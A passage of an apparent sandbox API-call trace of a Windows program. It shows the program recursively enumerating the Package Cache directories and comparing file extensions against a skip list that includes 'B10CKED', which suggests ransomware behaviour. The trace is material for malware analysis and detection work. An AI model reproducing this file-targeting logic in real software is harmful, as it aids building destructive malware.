USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.170] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.170] CharUpperBuffW (in: 
lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.170] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.170] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\*.*", lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0x1c7fa8 [0110.171] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0110.171] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE 
CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE 
CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE 
CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\*.*", lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0x1c7fe8 [0110.172] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0110.172] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW 
(in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] 
CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\*.*", lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 0x1c8028 [0110.172] FindNextFileW (in: hFindFile=0x1c8028, 
lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0110.172] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0110.172] CharUpperBuffW (in: lpsz="msu", cchLength=0x3 | out: lpsz="MSU") returned 0x3 [0110.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="DAT", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="MSU", cchCount2=3) returned 1 
[0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="MSU", cchCount2=3) returned 1 [0110.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", 
cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="MSU", cchCount2=3) returned 2 [0110.174] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 0 [0110.174] FindClose (in: hFindFile=0x1c8028 | out: hFindFile=0x1c8028) returned 1 [0110.174] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0 [0110.174] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0110.174] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0110.174] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0110.174] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0110.174] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.174] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package 
Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE 
CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.175] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.175] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.175] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.175] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.175] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.175] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.175] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package 
